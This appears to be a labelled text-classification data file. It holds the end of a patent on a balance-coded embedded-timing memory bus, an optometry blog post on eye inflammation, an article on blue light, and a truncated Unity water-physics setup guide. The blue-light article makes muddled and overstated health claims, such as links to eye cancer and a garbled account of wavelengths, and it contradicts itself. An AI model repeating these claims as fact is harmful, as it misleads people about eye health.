preceding symbol. Thus, because no two consecutive output symbols are repeated, the receivinginterface will be able to detect a signal transition on at least one of the signal lines. The receiving interface can use the detected transitions to generate a clock signal. In still another aspect of the present invention, the encoder can output a MASK symbol to indicate that data is masked. This aspect can be advantageously used in memory applications, which typically define a mask bit in the interface. In yet another aspect of the present invention, the interface can use symbols that are not used for data or mask symbols for command/control purposes. For example, in one embodiment, these "spare" symbols can be used to configure interconnectdevices such as multiplexers and interleavers. BRIEF DESCRIPTION OF THE DRAWINGS Non-limiting and non-exhaustive embodiments of the present invention are described with reference to the following figures, wherein like reference numerals refer to like parts throughout the various views unless otherwise specified. FIGS. 1-1B are block diagrams illustrating exemplary systems that include a balance-coded embedded-timing interface according to an embodiment of the present invention. FIG. 2 is a diagram illustrating the pertinent timing of the interface depicted in FIG. 1B, according to one embodiment of the present invention. FIG. 3 is a diagram illustrating a 4-bit/6-bit balance-coded embedded-timing interface, according to an embodiment of the present invention. FIG. 4 is a diagram illustrating symbol assignments for the 4-bit/6-bit balance-coded embedded-timing interface of FIG. 3, according to one embodiment of the present invention. FIG. 5 is a block diagram illustrating one of the 4-bit/6-bit balance-coded embedded-timing codecs of FIG. 3, according to one embodiment of the present invention. DETAILED DESCRIPTION OF PREFERRED EMBODIMENTS FIG. 1 illustrates an exemplary system 100 with "generic" bus interface devices 101.sub.1 and 101.sub.2 having balance-coded embedded-timing coder/decoder (CODEC) 103.sub.1 and CODEC 103.sub.2, respectively. Bus interface devices 101.sub.1 and101.sub.2 are coupled to a bus 109 having a data width of N bits. In this embodiment, system 100 supports bi-directional data traffic on bus 109. Bus 109 can be a terminated bus. In addition, in other embodiments, bus 109 may have additional lines foraddressing and/or control so that the total width of bus 109 exceeds N bits. These additional lines need not be encoded. CODECs 103.sub.1 and 103.sub.2 are each configured to encode a received stream of M-bit data symbols into N-bit data symbols to be transmitted onto bus 109, with N being greater than M. For reasons described below, N is constrained to be even inthis embodiment. For example, in one embodiment, N is six and M is four (i.e., 4b-6b nibble encoding). In other embodiments, M is a multiple of four (corresponding to bytes or words) and N is the same multiple of six. In still other embodiments, M andN need not be multiples of four and six. CODECs 103.sub.1 and 103.sub.2 are also configured to decode a received stream of N-bit data symbols received via bus 109 into corresponding M-bit data symbols. One example of 4b-6b encoding is summarized in thetable of FIG. 4, described below. In addition, in accordance with embodiments of the invention, CODEC 103.sub.1 encodes each M-bit input data symbol into an N-bit output data symbol with equal numbers of logic high and logic low bits. Symbols having equal numbers of logic highand logic low bits are referred to herein as being balanced. This balanced-coding achieves a relatively low local SSO noise level compared to typical unbalanced signaling used in some conventional interfaces. As a result, the interface can be operatedat a relatively high rate (e.g., similar to the rates achievable in differential signaling) using about half the number signal lines. In a further refinement, the CODECs can be configured so that one of the "spare" N-bit symbols (i.e., a symbol not needed to define a M-bit data symbol) is used as a "REPEAT" symbol. This N-bit REPEAT symbol is used when a current M-bit datasymbol to be encoded is identical to the previously encoded symbol. Thus, if a CODEC consecutively receives two identical L-bit data symbols, the CODEC will encode first M-bit data symbol into the corresponding N-bit data symbol and the second M-bitdata symbol into the REPEAT symbol. Consequently, the logic level of a signal on at least one signal line of bus 109 will transition with every transmitted symbol. The receiving interface device can be configured to generate a timing signal from thedata lines of bus 109, using a transition on any of the data lines to toggle the timing signal. Thus, this embodiment advantageously eliminates the need for a signal line dedicated for timing signal, thereby reducing the number of signal lines needed inbus 109 (two lines if the bus is differential). In addition, this timing signal is generated locally, thereby advantageously reducing skew compared to conventional timing systems that use global timing signals. In the case of a third consecutive identical M-bit symbol being received by the CODEC, the CODEC would encode the M-bit into the corresponding N-bit symbol (as is the case with the first M-bit signal of the sequence). Therefore, the third N-bitsymbol is again different from the preceding symbol, causing at least one logic level transition on bus 109 (so that the timing signal can be extracted). FIG. 1A illustrates an exemplary memory system 100A with a memory controller 101A.sub.1 (that includes CODEC 103.sub.1), an interleaving unit 101A.sub.2 (that includes CODEC 103.sub.2) and a memory 120 having dual in-line memory modules (DIMMs)122.sub.1 through 122.sub.L. The elements of memory system 100A are interconnected as follows. CODEC 103.sub.1 of memory controller 101A.sub.1 and CODEC 103.sub.2 of interleaving unit 101A.sub.2 are connected to N-bit bus 109. Interleaving unit 101A.sub.2 is connected toDIMMS 122.sub.1 through 122.sub.L of memory 120 via buses 124.sub.1 through 124.sub.L respectively. In this embodiment, buses 124.sub.1 through 124.sub.L are "non-encoded" single-ended buses, each being M-bits wide, as used in a typical conventionalmemory system. This embodiment of memory system 100A operates as follows. To write data to memory 120, CODEC 103.sub.1 receives a stream M-bit data symbols from a data source (not shown) and encodes them into a stream of N-bit data symbols (as described abovein conjunction with FIG. 1). Memory controller 101A.sub.1 transmits the N-bit data symbols to interleaving unit 101A.sub.2 via bus 109. In one embodiment, bus 109 operates at a frequency that is L times the operating frequency of buses 124.sub.1through 124.sub.L. Because this is a point-to-point connection (no stubs), bus 109 is not restricted to industry standard memory speeds. For example, bus 109 can be operated at a relatively high rate compared to those conventional buses that have aload of L DIMMs. In this way, for each memory cycle (i.e., at the memory speed) on buses 124.sub.1 through 124.sub.L, memory controller 101A.sub.1 can access each of DIMMs 122.sub.1 through 122.sub.L via interleaving unit 101A.sub.2. For example, in one embodiment, memory controller 101A.sub.1 is configured to transmit L N-bit data symbols to interleaving unit 101A.sub.2, where each of the L N-bit data symbols are to be written into a corresponding DIMM of DIMMs 122.sub.1through 122.sub.L of memory 120. Memory controller 101A.sub.1 can transmit these L N-bit data symbols to interleaving unit 101A.sub.2 during one memory cycle of memory 120. CODEC 103.sub.2 of interleaving unit 101A.sub.2 decodes the L N-bit datasymbols into L M-bit data symbols. Interleaving unit 101A.sub.2 then outputs each decoded M-bit data symbol onto the corresponding bus of buses 124.sub.1 through 124.sub.L. In one embodiment, interleaving unit 101A.sub.2 can latch the L M-bit datasymbols onto buses 124.sub.1 through 124.sub.L so that memory 120 can store the data from buses 124.sub.1 through 124.sub.L in DIMMs 122.sub.1 through 122.sub.L, respectively. To read data, memory 120 causes a M-bit data symbol from each of DIMMS 122.sub.1 through 122.sub.L to be output on buses 124.sub.1 through 124.sub.L, respectively, during a memory cycle. Interleaving unit 101A.sub.2 receives these L M-bit datasymbols on buses 124.sub.1 through 124.sub.L. CODEC 103.sub.2 encodes the L M-bit data symbols into L N-bit data symbols. In the duration of one memory cycle, interleaving unit 101A.sub.2 serially transmits the L N-bit data symbols to memory controller101A.sub.1 via bus 109. As previously stated, in one embodiment bus 109 operates at L times the rate of buses 124.sub.1 through 124.sub.L. In a further refinement, one or more "spare" N-bit symbols (i.e., not assigned as a data symbol corresponding to a L-bit data symbol) can be used to configure interleaving unit 101A.sub.2. For example, memory controller 101A.sub.1 can send anN-bit symbol that represents a command to configure interleaving unit 101A.sub.2 to operate with K DIMMs of L possible DIMMs that are installed as part of memory 120. Other examples include using N-bit symbol(s) to configure interleaving unit 101A.sub.2for calibration control, timing control, driver control, receiver control, etc. In other embodiments, spare symbols can be defined as command delimiter symbols so that symbols that would normally be used as data symbols are defined as control orconfiguration symbols when transmitted between the command delimiter symbols. In another embodiment, memory 120 can be logically divided into P sections with L/P DIMMs in each section. In this embodiment, interleaving unit 101A.sub.2 can function in part as a multiplexer so that a selected section can be interleaved. Forexample, in one embodiment, L can be eight and P can be two. Therefore, there are four DIMMs per section and, in this example, bus 109 is operated at four times the rate of buses 124.sub.1 through 124.sub.L to achieve "4.times." interleaving. Forexample, to write data into the section that contains DIMMs 122.sub.1 through 122.sub.4, memory controller 101A.sub.1 can cause interleaving unit 101A.sub.2 to select buses 124.sub.1 through 124.sub.4 (as in a multiplexer) and then interleave four N-bitdata symbols received from memory controller 101A.sub.1 to DIMMs 122.sub.1 through 122.sub.4 in a manner as described above. FIG. 1B illustrates an exemplary computer system 100B that includes a processor 130, a memory controller 101B.sub.1 (that includes CODEC 103.sub.1), an interleaving unit 101B.sub.2, and a double data rate (DDR) memory 120B having four DIMMS122.sub.1 through 122.sub.4. Interleaving unit 101B.sub.2 includes an interleaving device 132 (that includes CODEC 103.sub.2) and interleaving devices 134.sub.1 and 134.sub.2. In other embodiments, a single unit can provide the same interleavingfunctionality. In this embodiment, processor 130 communicates with memory controller 101B.sub.1 via a bus 132 having a data word width of K bits. Memory controller 101B.sub.1 communicates with interleaving unit 101B.sub.2 via bus 109, which in turncommunicates with memory 120B via buses 124.sub.1 through 124.sub.4. In this embodiment, interleaving unit 101B.sub.2 communicates with DIMMs 122.sub.1 and 122.sub.2 of memory 120 via interleave devices 132 and 134.sub.1 and buses 136.sub.1, 124.sub.1and 124.sub.2. Similarly, interleaving unit 101B.sub.1 communicates with DIMMs 122.sub.3 and 122.sub.4 of memory 120 via interleave devices 132 and 134.sub.2 and buses 136.sub.2, 124.sub.3 and 124.sub.4. The operation of computer system 100B isdescribed below in conjunction with FIG. 2. FIG. 2 illustrates the timing of bus 109 (FIG. 1B) in transferring data between memory controller 101B.sub.1 (FIG. 1B) and interleaving unit 101B.sub.2 (FIG. 1B), according to one embodiment of the present invention. Referring to FIGS. 1B and 2,memory 120B can be accessed as follows. In one embodiment, a word of data is 4.times.M bits wide (i.e., K=4M) so that each data word has four M-bit symbols. For example, M can be a nibble wide (e.g., 4-bits), so that K is 16-bits. With M=4, N is selected to be six in this example. With N=6, there are 20 balanced N-bit symbols, enough to represent all possible values of a nibble, with four extra balanced symbols for other purposes (e.g., REPEAT, MASK, etc. symbols). One implementation of such a 4-bit/6-bit scheme is described inmore detail in conjunction with FIG. 3 below. In this example, the K-bit data word has four M-bit symbols indicated as nibble 1 through nibble 4 in FIG. 2, where nibble 1 has the same value as nibble 2. Further, in this example, the last M-bit symbol (i.e., nibble 4) is to be masked. Although a 16-bit word/bus width and 4-bit/6-bit symbol encoding are used in this embodiment, other embodiments may have a different combination of word sizes, symbol (both M-bit and N-bit) sizes, and bus widths. For example, a 16-bit word/bus lengthand 8-bit/11-bit symbol encoding can be used in another embodiment to reduce the number of lines (i.e., 22 lines for 8-bit/11-bit encoding vs. 24 lines for 4-bit/6-bit encoding). CODEC 103.sub.1 receives the "first" K-bit data word and sequentially outputs four N-bit data symbols, with each N-bit data symbol representing a M-bit nibble of the K-bit data word. These N-bit symbols are shown as symbols 201-204 in FIG. 2,corresponding to nibble 1 through nibble 4 of the K-bit data word. As previously described, CODEC 103.sub.1 outputs the N-bit symbols as balanced symbols. In addition, as previously described, CODEC 103.sub.1 outputs these symbols so that no symbol isconsecutively repeated. Thus, symbol 201 is the N-bit symbol corresponding to M-bit nibble 1, while symbols 203 and 204 are the N-bit symbols corresponding to M-bit nibbles 3 and 4. In this example, the M-bit nibble corresponding to N-bit symbol 202has the same value as that of the nibble corresponding to symbol 201; thus, in accordance with this embodiment of the invention, symbol 202 is a REPEAT symbol. As previously described, the REPEAT symbol indicates that its corresponding nibble is thesame as the previous nibble (i.e., nibble 1 in this example). Similarly, when CODEC 103.sub.1 receives the four M-bit symbols (i.e., nibbles in this example) of the next data word via bus 132 from processor 130, CODEC 103.sub.1 outputs corresponding N-bit symbols 201A, 202A, and so on. Memory controller 101B.sub.1 outputs the N-bit symbols from CODEC 103.sub.1 to interleaving unit 101B.sub.2. CODEC 103.sub.2 of interleaving unit 101B.sub.2 then decodes the N-bit symbols from memory controller 101B.sub.1 into M-bit symbols(i.e., 4-bit nibbles in this example). In this example, CODEC 103.sub.2 decodes: N-bit symbol 201 into M-bit nibble 1; N-bit symbol 202 (i.e., the REPEAT symbol) into M-bit nibble 2 identical to nibble 1; N-bit symbol 203 into M-bit nibble 3; and N-bitsymbol 204 (i.e., the MASK symbol) into any nibble value (i.e., don't care bits). In one embodiment, the don't care bits are output as logic low bits. The decoded data symbols are shown as a waveform 220 in FIG. 2. In addition, in decoding the MASK symbol 204, CODEC 103.sub.2 asserts the MASK signal that is part of the interface of DDR memory 120B. The MASK signal is shown as a waveform 222 in FIG. 2. In this embodiment, decoding the N-bit symbols also includes CODEC 103.sub.2 generating a timing signal (i.e., a strobe signal in this example that is part of the interface of DDR memory 120B) from the received symbols. In this embodiment, eachsymbol causes a transition in the timing signal. CODEC 103.sub.2 can generate the timing signal from the received symbols because, as previously described, no two consecutively transmitted symbols are identical. Thus, at least one bit betweenconsecutively transmitted symbols transitions. CODEC 103.sub.2 detects the bit transition(s) between symbols and uses the detected transitions to cause transitions in the timing signal. For example, in one embodiment, CODEC 103.sub.2 can includetransition detector logic (e.g., see FIG. 5) that performs an XOR operation on the current symbol and the previous symbol to drive a flip-flop used in generating the timing signal. Any suitable transition detection circuitry can be used in otherembodiments, including indirect timing generation using phase locked loop (PLL) circuits, delay locked loop (DLL) circuits, etc. The timing signal is shown as a waveform 224 in FIG. 2. In this embodiment, interleaving device 132 of interleaving unit 101B.sub.2 then provides the decoded M-bit symbols, MASK and timing signals to interleave devices 134.sub.1 and 134.sub.2 via buses 136.sub.1 and 136.sub.2, respectively. Forexample, in one embodiment, interleave device 132 is configured to provide: (a) the MASK signal, the timing signal, and the first and second decoded M-bit symbols of a data word to interleave device 134.sub.1 ; and (b) the MASK signal, the timing signal,and the third and fourth M-bit symbols of that data word to interleave device 134.sub.2. In a standard parallel interface, the MASK, timing and data signals would be appropriately timed on bus 136.sub.1. In turn, interleave device 134.sub.1 is configured to provide over a standard parallel interface: (c) the received MASK signal, timing signal, and first M-bit symbol to DIMM 122.sub.1 via bus 124.sub.1 ; and (d) the received MASK signal, timingsignal, and second M-bit symbol to DIMM 122.sub.2 via bus 124.sub.2. Similarly, interleave device 134.sub.2 is configured to provide: (e) the received MASK signal, timing signal, and third M-bit symbol to DIMM 122.sub.3 via bus 124.sub.3 ; and (f) thereceived MASK signal, timing signal, and fourth M-bit symbol to DIMM 122.sub.4 via bus 1243.sub.4. When reading a data word from memory 120B, each of DIMMs 122.sub.1 -122.sub.4 outputs its corresponding M-bit symbol of the addressed data word to interleaving unit 101B.sub.2. Interleave devices 134.sub.1 and 134.sub.2 provide the M-bit symbolsreceived from DIMMs 122.sub.1 -122.sub.4 to interleave device 132. Interleave device 132 then encodes the received M-bit symbols to N-bit symbols, which are then output to memory controller 101B.sub.1 via bus 109. Memory controller 101B1 then decodesthe received N-bit symbols back to M-bit symbols, which can then be concatenated into a data word and outputted to processor 130 via bus 132. FIG. 3 illustrates a 4-bit/6-bit balance-coded embedded-timing interface, according to an embodiment of the present invention. CODECs 300.sub.1 and 300.sub.2 are similar to CODECs 103.sub.1 and 103.sub.2 (FIG. 1B) except that CODECs 300.sub.1and 300.sub.2 are specifically 4-bit/6-bit CODECs. In this embodiment, CODEC 300.sub.1 has a 4-bit data interface that includes a STROBE line 301, a MASK line 303 and data lines 305.sub.1 -305.sub.4. In addition, CODEC 300.sub.1 has a 6-bit data interface to bus 109 that includes lines 109.sub.1-109.sub.6. CODEC 300.sub.2 also has a 6-bit interface to bus 109 and a 4-bit data interface that includes a STROBE line 311, a MASK line 313 and data lines 315.sub.1 -315.sub.4. CODECs 300.sub.1 and 300.sub.2 are each configured to encode received 4-bit data symbols (e.g., nibbles) into balanced 6-bit symbols and to decode received 6-bit symbols into 4-bit data symbols or nibbles. One exemplary encoding scheme issummarized in the table of FIG. 4. As seen in FIG. 4, there are twenty balanced symbols possible using 6-bit symbols. Sixteen of the balanced 6-bit symbols are used for defining 4-bit data symbols, with four extra balanced 6-bit symbols. For example,CODEC 300.sub.1 can receive 4-bit data symbols via lines 305.sub.1 -305.sub.4, where transitions of the signal on STROBE line 301 indicating when to sample the data on lines 305.sub.1 -305.sub.4. CODEC 300.sub.1 would then output the corresponding 6-bitsymbol (according to the table of FIG. 4) onto lines 109.sub.1 -109.sub.6 to CODEC 300.sub.2. CODEC 300.sub.2 can then decode the received 6-bit symbols according to the table of FIG. 4. Data flow in the opposite direction is performed in substantiallythe same manner except that CODEC 300.sub.2 performs the encoding and CODEC 300.sub.1 performs the decoding. One of the four extra balanced 6-bit symbols is used to define the aforementioned REPEAT symbol. In this embodiment, the REPEAT symbol is used as follows. If a CODEC consecutively receives two 4-bit symbols that are the same, the CODEC willoutput the REPEAT symbol for the second 4-bit symbol instead of outputting the 4-bit symbol's corresponding 6-bit symbol again. In this way, there will be at least one transition on lines 109.sub.1 -109.sub.6, which can be detected by the receivingCODEC to generate a STROBE signal. In this embodiment, another of the four extra balanced 6-bit symbols is used to define the aforementioned MASK symbol. For example, CODEC 300.sub.1 outputs the MASK symbol in response to the signal received on MASK line 303. In this embodiment,When the signal on MASK line 303 is asserted, CODEC 300.sub.1 is configured to ignore the signals on lines 305.sub.1 -305.sub.4 and to output the MASK symbol according to the table of FIG. 4. CODEC 300.sub.2 decodes the received MASK symbol and inresponse asserts the signal on MASK line 311. The signals on lines 315.sub.1 -315.sub.4 may remain the same as in the previous cycle or may be pulled up or down, depending on the design. Data flow in the opposite direction is performed in substantiallythe same manner except that CODEC 300.sub.2 performs the encoding and CODEC 300.sub.1 performs the decoding. The other two balanced 6-bit symbols are used to define control start and control end delimiters (i.e., CNTL_START and CNTL_END). These delimiters can be used to indicate that symbols received between the delimiters are control symbols. Thesecontrol symbols can be used to configure devices in the data path (e.g., interleaving devices 132, 134.sub.1 and 134.sub.2 in FIG. 1B). FIG. 4 illustrates symbol assignments for the 4-bit balance-coded embedded-timing interface of FIG. 3, according to one embodiment of the present invention. Other assignments are illustrated in FIGS. 4A and 4B, which are defined so that thelogic implementation may be simplified. For example, the definitions in FIGS. 4A and 4B are selected so that the first two bits of the symbol code match the first two bits of the "nibble definitions". In other embodiments, different symbol assignmentscan be used. FIG. 5 illustrates CODEC 300.sub.2 (FIG. 3), according to one embodiment of the present invention. This embodiment includes a symbol transition detector 501, decode logic 502 and encode logic 503. A delay circuit 505 can be included to adjustthe phase of the STROBE signal. Transition detector 501 is connected to receive 6-bit symbols via lines 109.sub.1 -109.sub.6. Transition detector 501 has an output line connected to an input lead of delay circuit 505, which has an output lead connected to STOBE line 311. Transition detector 501 can be implemented using any suitable logic to detect a transition on any of lines 109.sub.1 -109.sub.6 and generate therefrom a transition on signal being output to delay circuit 505. As previously described, transition detector501 can include XOR logic to operate on a currently received 6-bit symbol and the previously received 6-bit symbol, with the XOR logic outputting a pulse in response to any transition on lines 109.sub.1 -109.sub.6. This pulse is used to clock aflip-flop, which generates the STROBE signal. In one embodiment, because the 6-bit symbols must be balanced, the logic only needs to consider the three of the bits of the symbol that were at "1" and determine whether there was a change. This approachcan be less complex to implement. Decode logic 502 is also connected to receive 6-bit symbols via lines 109.sub.1 -109.sub.6. In addition, decode logic 502 has output leads connected to MASK line 313 and to lines 315.sub.1 -315.sub.4. Decode logic 502 can be implemented usingany suitable logic to implement symbol assignments of the table of FIG. 4. Encode logic 503 is connected to receive 4-bit data symbols from lines 315.sub.1 -315.sub.4 and STROBE and MASK signals via lines 311 and 313. Encode logic 503 can be implemented using any suitable logic to implement symbol assignments of thetable of FIG. 4. In one embodiment, a control signal is asserted to enable transition detector 501 and decode logic 502 while substantially simultaneously disabling encode logic 503 so that CODEC 300.sub.2 can receive and decode 6-bit symbols from CODEC 300.sub.1(FIG. 3). Conversely, when CODEC 3002 is to receive and encode 4-bit data symbols, this control signal can be de-asserted to disable transition detector 501 and decode logic 502 while enabling encode logic 503. In this embodiment, CODEC 300.sub.1 (FIG. 3) is implemented in substantially the same way as this embodiment of CODEC 300.sub.2. Although balance-coded embodiments are described above, the embedded timing feature can be used in embodiments that do not used balance-coding. Embodiments of method and apparatus for a balance-coded embedded-timing interface are described herein. In the above description, numerous specific details are set forth (such as the number of bits, the state assignments, etc.) to provide athorough understanding of embodiments of the invention. One skilled in the relevant art will recognize, however, that embodiments of the invention can be practiced without one or more of the specific details, or with other methods, components,materials, etc. In other instances, well-known structures, materials, or operations are not shown or described in detail to avoid obscuring the description. Reference throughout this specification to "one embodiment" or "an embodiment" means that a particular feature, structure, or characteristic described in connection with the embodiment is included in at least one embodiment of the presentinvention. Thus, the appearances of the phrases "in one embodiment" or "in an embodiment" in various places throughout this specification are not necessarily all referring to the same embodiment. Furthermore, the particular features, structures, orcharacteristics may be combined in any suitable manner in one or more embodiments. In addition, embodiments of the present description may be implemented not only within a semiconductor chip but also within machine-readable media. For example, the designs described above may be stored upon and/or embedded within machinereadable media associated with a design tool used for designing semiconductor devices. Examples include a netlist formatted in the VHSIC Hardware Description Language (VHDL) language, Verilog language or SPICE language. Some netlist examples include: abehavioral level netlist, a register transfer level (RTL) netlist, a gate level netlist and a transistor level netlist. Machine-readable media also include media having layout information such as a GDS-II file. Furthermore, netlist files or othermachine-readable media for semiconductor chip design may be used in a simulation environment to perform the methods of the teachings described above. Thus, embodiments of this invention may be used as or to support a software program executed upon some form of processing core (such as the CPU of a computer) or otherwise implemented or realized upon or within a machine-readable medium. Amachine-readable medium includes any mechanism for storing or transmitting information in a form readable by a machine (e.g., a computer). For example, a machine-readable medium can include such as a read only memory (ROM); a random access memory (RAM);a magnetic disk storage media; an optical storage media; and a flash memory device, etc. In addition, a machine-readable medium can include propagated signals such as electrical, optical, acoustical or other form of propagated signals (e.g., carrierwaves, infrared signals, digital signals, etc.). The above description of illustrated embodiments of the invention, including what is described in the Abstract, is not intended to be exhaustive or to be limitation to the precise forms disclosed. While specific embodiments of, and examples for,the invention are described herein for illustrative purposes, various equivalent modifications are possible, as those skilled in the relevant art will recognize. These modifications can be made to embodiments of the invention in light of the above detailed description. The terms used in the following claims should not be construed to limit the invention to the specific embodiments disclosed in thespecification and the claims. Rather, the scope is to be determined entirely by the following claims, which are to be construed in accordance with established doctrines of claim interpretation. * * * * *       Recently Added Patents Toilet bowl Electronic badge Granulated sweetening composition Vehicle headlight Semiconductor memory device and method for driving the same Preparation and use of meristematic cells belonging to the Dendrobium phalaenopsis, Ansellia, Polyrrhiza, Vanilla, Cattleya and Vanda genera with high content of phenylpropanoids, hydrosoluble Surface-emitting laser light source using two-dimensional photonic crystal   Randomly Featured Patents Authenticated time device Gun Apparatus and method for locating assets within a rail yard Non-contact topographical analysis apparatus and method thereof Non-stop toll collection system and method Fire-resisting device for piping extending through a wall Method and apparatus for managing wire rope slings Oscillator and method for operating an oscillator Planar antenna with integral impedance matching Apparatus, method and program for alarming abnormality in tire air-pressure  
__label__pos
0.970239
Inflammation can be a serious problem when it happens in the eyes. It will leave the eyes open to infections and also be uncomfortable for the person who is dealing with it. However, an eye doctor in Miami can help those who are dealing with constant eye inflammation in a number of different ways. The first part of treating someone’s eye inflammation is figuring out what’s causing it in the first place. People can develop inflamed eyes because of dryness, other diseases, and also the things they do throughout the day. Visiting a Miami optometrist and discussing your inflammation issues is the first step to stopping your eyes from being inflamed on a daily basis. Ways to Treat Eye Inflammation If someone is dealing with constant eye inflammation, then they are likely going to need a prescription from an eye doctor in Miami. There are special drugs that can reduce the amount of swelling in the eyes, allowing someone to get through the day without constant rubbing and feeling uncomfortable. ● Using corticosteroid eye drops. There are special eye drops that contain steroids which patients can use to reduce their inflammation. Some of these eye drops also contain antibiotics that will help to prevent infections from happening. ● Using non-steroidal anti-inflammatory eye drops. These eye drops are going to prevent inflammation, but they do not contain any steroids. ● Over-the- counter eye drops. Some eye drops that can be bought from the store without a prescription are satisfactory for treating some people’s eye inflammation. Search for a product that specifically states it helps with inflammation and try it out. Other Things That Can Help Decrease Inflammation In addition to getting eye drops that can help with inflammation, people who are prescribed eyeglasses in Miami Beach should be wearing them as often as possible. Wearing the glasses will prevent someone from putting strain on their eyes, reducing their risk of inflammation. There are also certain diets people can try that are high in antioxidants and fatty acids, which are essential to good eye health. Finding out what foods may cause the inflammation is also beneficial for people who aren’t aware of how their diet can affect the health of their eyes. photo credit: IMG_2633-Edit via photopin (license) Originally posted 2017-03-12 03:27:44.
__label__pos
0.624014
What Is Blue Light? A Complete Scientific Guide Blue light is part of the electromagnetic spectrum that humans can see. Blue light has a wavelength between 500 and 380 nanometers, making it the most potent and shortest-lasting frequency. About a third of the visible light spectrum is made up of blue light. Most of the time, the blue light comes from the sun. Fluorescent light bulbs, LED TVs and computer screens, mobile phones, and tablets all give off blue light, but humans make it all. Although it is often associated with electronic equipment, the sun is the most significant supply of blue-colored light. The lighting options include CFLs, regular fluorescents, as well as LEDs. The amount of blue light produced by screens is significantly less than that produced by the sun. It's also more secure than the blue light naturally visible in the sun. Growths, cataracts, and eye cancers are just three conditions that may be caused by exposure to UV radiation. When compared to other colors, blue light is one we need more information about. The research into its consequences continues. Does Blue Light Make you Healthier? Researchers have found that blue light makes people more alert, improves brain function and memory, and makes them happier. In a way, it controls whether you feel alert or sleepy, whether you are aware of it or not (circadian cycle). Young children also benefit from being in the light because it helps their eyes and vision grow. How bad is it to be in blue light? Compared to being outside in the sun, screens only give off a small amount of blue light. But there are worries about the long-term effects of spending too much time in front of screens. This is especially true when screens are too close and right in front of the eyes for long periods. 80% of American adults use digital devices for more than 2 hours daily. About 77% of them use more than one device simultaneously. More than half of the people who use computers have some digital eye stress. Blue light is hard for our eyes to block, so almost all of it gets through the lens and cornea to the retina, turning light into an image the brain can understand. If you are exposed to blue light for a long time, it could hurt the cells in your retina. This could lead to macular degeneration and other vision problems as you age. It is also linked to eye cancer, cataracts, and growths on the cornea, which is the clear cover that protects the whites of the eye. A study on eye health and vision by the National Eye Institute found that children's eyes are much more likely to be hurt by the blue light that electronic devices give off than adults' eyes. When using a digital device, the person is likely to blink less, which could lead to dry eyes and more pressure on the eye. When you strain your eyes, they can become irritable, and headaches and shoulder and neck pain are also common. The Vision Council says that 27% to 35% of adults in the U.S. have had at least one of these symptoms when using electronic devices. How blue light affects the ability to fall asleep? Even though there are a lot of studies about blue glasses, there is yet to be a clear answer. But they can lessen the effect that blue light has on the eyes. Those who need to spend a considerable time in front of a computer screen can ease the strain on their eyes by wearing glasses that block blue light. Blue-light-blocking glasses worn during the day have been shown to help people get to sleep, stay asleep, and get better sleep. Blue-light-filtering lenses can reduce harmful effects by 10–23% without affecting the quality of the image. Lenses with yellow tints can help people who use digital devices for long periods feel more comfortable. The amount of blue light determines when our bodies begin producing melatonin. As a result of this, avoiding blue light in the hours leading up to bedtime may also result in an improvement in the quality of sleep. The most prevalent diseases, including type 2 diabetes, cancer, heart disease, sleep disorders, and cognitive issues, might be brought on by disrupting the circadian rhythm. Hence, to have a sound sleep, avoiding using electronic devices such as mobile and laptop before going to bed is better. Use glasses that block blue light It has been shown that protecting your eyes from blue light during the day can help with the process's onset, maintenance, and quality. Blue light hurts the eyes, but generic lenses that block the blue wavelength could reduce the damage by 10–23% without lowering the quality. Putting yellow lenses on your computer screen can make it easier to look at it for long periods. You can put a blue-light filter on your phone, tablet, and computer. The filters, which stop most of the blue light that would otherwise get into your eyes, don't change how clear the screen is. Conclusion The portion of the electromagnetic spectrum that seems blue is indeed present in natural settings. The sun is the primary source of most of the blue light you see. However, some specialists in the field of medicine believe that exposure to blue light from artificial sources can harm the eyes. Experiments on animals have demonstrated that exposure to blue light damages cellular health. Not much data suggests that the blue light emitted by electronic devices such as tablets, smartphones, and LED televisions harms people's eyes. However, if you are required to sit in front of a computer for an extended period for school or work, you should take frequent rests to prevent your eyes from becoming weary. If you use electronic devices at night, turn them into the amber light mode or put them away at least an hour before you sleep. It has been demonstrated that exposure to blue light disrupts the body's natural sleep-wake cycle. Updated on: 14-Feb-2023 72 Views Kickstart Your Career Get certified by completing the course Get Started Advertisements
__label__pos
0.994047
User Tools Quick Start This quick start guide will explain how to set up a primitive sphere to interact with water. An empty scene will be used for the example. Initial Project Setup Project Settings > Player > Api Combatibility Level needs to be set to .NET 4.x. Assembly Definitions Since all the NWH assets have been updated to use assembly definitions here is a disclaimer to avoid confusion when updating: This asset uses Assembly Definition (.asmdef) files. There are many benefits to assembly definitions but a downside is that the whole project needs to use them or they should not be used at all. • If the project already uses assembly definitions accessing a script that belongs to this asset can be done by adding an reference to the assembly definition of the script that needs to reference the asset. E.g. to access AdvancedShipController adding a NWH.DWP2 reference to MyProject.asmdef is required. • If the project does not use assembly definitions simply remove all the .asmdef files from the asset after import. Using, for example, Lux Water (which does not fature assembly definitions) will therefore require an addition of .asmdef file inside the Lux Water directory and a reference inside NWH.DWP2.asmdef or removal of all .asmdef files from the asset if you do not wish to use assembly definitions. Some assets such as Crest already feature .asmdefs and adding Crest as a reference to NWH.DWP2 is the only step needed. Water Object Manager WaterObjectManager has been removed in v2.5. All the settings and simulation is now handled by the WaterObject Water Object Any physics object that is active and has WaterObject attached will interact with water. There are two requirements for WaterObject to work: a Rigidbody and a MeshFilter: • MeshFilter is required so that the WaterObject knows which mesh to use for simulation. • Rigidbody does not have to be attached to the same object as WaterObject, but it must be present in one of its parents. This allows for composite objects; one Rigidbody with multiple hulls - such as a trimaran. Example Manual Setup 1. Add a 3D Object ⇒ Sphere to the scene. 2. Add a Sphere Collider to the Sphere if is not automatically added. 3. Add a Rigidbody to the Sphere and set its mass to 300. There is also a script called MassFromMaterial which can calculate and set the Rigidbody mass based on material density and mesh volume, but it is a helper script and not required. 4. Add WaterObject to the Sphere. Since the sphere by default has 768 triangles Simplify Mesh option should be used. This option automatically decimates the mesh to a Target Triangle Count. A good triangle count is 30 or less for simple objects and around 60 for ship hulls. Using higher triangle count will only have a minor influence on simulation quality but will have a linear performance penalty (doubling the triangle count will about halve the performance). Therefore, adjusting the triangle count until the object starts to lose its shape is recommended. In the case of the example sphere 36 will be enough: Example Auto Setup 1. Add a 3D Object ⇒ Sphere to the scene. 2. Attach WaterObjectWizard to the sphere and press Auto-Setup. Example WaterObject setup. Water Data Provider WaterDataProvider is a script that tells WaterObject where the water is. It is an interface between water systems/assets and DWP2 and allows the two to communicate. All flat water assets/shaders use the same WaterDataProvider: FlatWaterDataProvider while for wavy assets such as Crest, an asset-specific WaterDataProvider has to be used, e.g. CrestWaterDataProvider. As of version v2.5 an option to use multiple water surfaces in the same scene has been added. This is done 